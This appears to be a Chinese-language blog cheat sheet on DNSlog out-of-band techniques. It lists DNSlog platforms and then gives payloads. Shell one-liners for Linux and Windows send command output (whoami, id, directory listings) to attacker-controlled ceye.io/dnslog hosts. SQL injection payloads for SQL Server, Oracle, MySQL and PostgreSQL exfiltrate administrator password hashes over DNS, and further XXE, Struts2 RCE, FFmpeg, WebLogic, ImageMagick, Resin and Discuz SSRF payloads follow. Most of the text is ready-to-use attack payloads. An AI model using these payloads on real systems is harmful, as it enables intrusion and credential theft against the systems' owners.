• 平台源码
    https://github.com/BugScanTeam/DNSLog
    https://github.com/LandGrey/dnstricker
  • 已知平台
    http://ceye.io/
    https://www.t00ls.net/dnslog.html

  • DNSlog攻击技巧

linux:

curl http://xxx.dnslog.link/`whoami`
ping -c 1 `whoami`.xxx.dnslog.link

如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制;
curl http://xxx.dnslog.link/$(id|base64)

碰到ls这类多个输出的命令,直接使用脚本;
for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;
來源: https://www.0dayhack.com/post-481.html

windows:

利用HTTP请求:
for /F %x in ('whoami') do start http://xxx.dnslog.link/%x
将结果使用默认浏览器弹出;

利用DNS请求:
获取计算机名:for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link
获取用户名:for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link

不能编码输出,但利用powershell可以实现;

dir有/b参数,不显示修改日期等信息,只显示文件名,所以可以弹出;
for /F %x in ('dir /b C:\') do start http://xxx.dnslog.link/[%x].jpg

  • ceye.io的payload

Command Execution

  1. *nix:
curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io
  1. windows
ping %USERNAME%.b182oj.ceye.io

SQL Injection

  • SQL Server
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');
  • Oracle
SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;
  • MySQL
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
iv. PostgreSQL
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();
0x02 XML Entity Injection
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>

Others

  • Struts2
xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}
xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
  • FFMpeg
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://ip.port.b182oj.ceye.io
#EXT-X-ENDLIST
  • Weblogic
xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
  • ImageMagick
push graphic-context
viewbox 0 0 640 480
fill 'url(http://ip.port.b182oj.ceye.io)'
pop graphic-context
  • Resin
xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf
  • Discuz
http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo

发表评论

电子邮件地址不会被公开。 必填项已用*标注